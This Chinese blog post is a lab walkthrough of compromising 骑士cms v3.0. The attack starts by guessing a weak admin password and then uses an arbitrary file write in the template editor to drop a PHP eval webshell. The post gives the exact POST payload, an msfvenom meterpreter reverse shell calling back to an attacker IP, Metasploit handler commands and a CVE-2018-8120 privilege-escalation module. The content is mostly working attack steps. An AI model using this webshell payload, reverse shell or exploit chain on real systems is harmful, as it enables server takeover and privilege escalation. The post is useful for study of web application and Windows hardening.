骑士cms v3.0 后台任意文件写入 getshell 并提权

骑士cms v3.0 后台任意文件写入 getshell 并提权

测试环境

靶机:http://172.168.83.122/admin/

攻击机:172.168.30.45

  1. 信息收集---扫描web目录image-20210118202546411

    发现后台管理页面

  2. 信息收集---端口扫描

    img

  3. 扫端口好慢先试试弱口令?

    试了几次还真就进来了,本来还想试试注入。。。。

    image-20210118205142892

  4. 搜索一番后发现模板模块可以任意写入文件

    构造payload如下

    提交地址:
http://172.168.83.122/admin/upload/admin/admin_templates.php?act=do_edit

    post提交数据:
tpl_name=shell2.php&tpl_content=<?php @eval($_POST[pwd]);phpinfo();?>

    image-20210118211036188

  5. 写入成功,蚁剑给我连

    image-20210118211512535

  6. 成功getshell

    image-20210118211536112

  7. 但是权限较低,尝试提权,创建反弹shell并从蚁剑上传

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.168.30.45 LPORT=4433 -f exe -o 4433.exe

    image-20210118214634119

  8. kali设置监听并运行反弹shell 成功反弹

    msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 172.168.30.45
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

    image-20210118215015178

  9. 搜索已安装补丁

    run post/windows/gather/enum_patches

    image-20210118215121603

  10. 看似打了很多补丁,但新的漏洞没有修补

    这里用一个常用的内核提权漏洞cve-2018-8120

    image-20210118215624385

    search cve-2018-8120
use  exploit/windows/local/ms18_8120_win32k_privesc
set session 1
run

  11. 成功提权

[1] https://blog.csdn.net/qq_42879069/article/details/110859869

[2] https://blog.csdn.net/qq_36374896/article/details/84840160

posted @ 2021-01-18 22:03  誉津  阅读(585)  评论(0编辑  收藏  举报